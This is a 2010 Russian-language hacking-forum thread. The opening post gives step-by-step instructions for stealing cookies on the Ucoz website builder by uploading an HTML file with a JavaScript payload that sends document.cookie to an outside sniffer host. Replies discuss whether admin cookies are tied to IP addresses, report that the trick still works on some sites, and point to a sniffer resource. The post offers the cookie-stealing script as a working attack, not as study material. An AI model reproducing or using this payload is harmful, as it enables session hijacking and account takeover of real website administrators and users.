ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
 
 
Опции темы Поиск в этой теме Опции просмотра

А вот и долгожданный Ucoz
  #1  
Старый 18.03.2010, 01:50
Dr..VATSON
Новичок
Регистрация: 07.12.2008
Сообщений: 12
Провел на форуме:
487591

Репутация: 43
По умолчанию А вот и долгожданный Ucoz

Всем привет! толькочто нашёл уязвимость в Ucoz, пишусь впервый раз))

Тырим куки в Ucoz

1) создаём фйлик html вписываем код который тырит куки
Код:
<script>img = new Image(); img.src = "http://sniffer.ru/images/1.gif?"+document.cookie;</script>
2) Загружаем наш html файлик через "Обзор"

Смотрим скрин

4) Должно получиться примерно так когда файлик загружен

Смотрим скрин

5) Смотрим логи на сниффере (у меня свой сниффер)

Смотрим скрин

Ну вот и всё...

Последний раз редактировалось Dr..VATSON; 18.03.2010 в 19:22..
 

  #2  
Старый 26.03.2010, 09:56
general.fox
Участник форума
Регистрация: 09.11.2009
Сообщений: 265
Провел на форуме:
312907

Репутация: 18
По умолчанию

На UcoZе куки Админов привязаны к IP.
 

  #3  
Старый 26.03.2010, 09:58
general.fox
Участник форума
Регистрация: 09.11.2009
Сообщений: 265
Провел на форуме:
312907

Репутация: 18
По умолчанию

Хотя может я ошибаюсь...
 

  #4  
Старый 04.04.2010, 17:16
Koder45ru
Новичок
Регистрация: 18.02.2010
Сообщений: 4
Провел на форуме:
12863

Репутация: 0
По умолчанию

Хех где то похожее читал ток там через чат можно админку на укозе утащить..
а так в целом прикольно за мутил респект..
 

  #5  
Старый 05.04.2010, 23:03
Rejiser
Новичок
Регистрация: 09.05.2009
Сообщений: 27
Провел на форуме:
153684

Репутация: 21
По умолчанию

Цитата:
Сообщение от Koder45ru  
Хех где то похожее читал ток там через чат можно админку на укозе утащить..
не подскажешь где читал?)
 

  #6  
Старый 06.04.2010, 07:52
sparrow3000
Участник форума
Регистрация: 27.03.2009
Сообщений: 248
Провел на форуме:
1152350

Репутация: 54
Отправить сообщение для sparrow3000 с помощью ICQ
По умолчанию

Цитата:
Сообщение от Koder45ru  
Хех где то похожее читал ток там через чат можно админку на укозе утащить..
а так в целом прикольно за мутил респект..
если про бесцветный смайлик со скриптом то это не пашет уже
 

  #7  
Старый 09.04.2010, 05:14
[Feldmarschall]
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388

Репутация: 87
По умолчанию

не новый способ.. подробнее кто хочет _http://hacker-pro.net/sniffer/ там и видео есть вроде
 

  #8  
Старый 14.05.2010, 12:06
NeoX
Познающий
Регистрация: 23.08.2008
Сообщений: 95
Провел на форуме:
585487

Репутация: 45
Отправить сообщение для NeoX с помощью ICQ
По умолчанию

еще актуально?
 

  #9  
Старый 16.05.2010, 22:56
niva622
Новичок
Регистрация: 05.11.2008
Сообщений: 11
Провел на форуме:
93930

Репутация: 0
По умолчанию

еще актуально, но на некоторых сайтах запрещено добавлять html файлы..
 

  #10  
Старый 26.05.2010, 16:48
<Maxwell>
Новичок
Регистрация: 27.10.2009
Сообщений: 23
Провел на форуме:
327324

Репутация: 12
Отправить сообщение для <Maxwell> с помощью ICQ
По умолчанию

Куки Админов привязаны к айпи. Хотя должно прокатить всеравно.
 
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
red.Button - UCOZ Pack v.3.0 - дополнении к доргену GivioN Разное - Покупка, продажа, обмен 0 03.01.2010 23:13
Скрипты под Ucoz Vandam PHP, PERL, MySQL, JavaScript 14 26.02.2009 16:50
Лучший стих для античата $ED$ Болталка 29 12.02.2009 02:47
Было в фирме три админа.!!! =) Utochka Болталка 15 18.03.2006 03:03



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ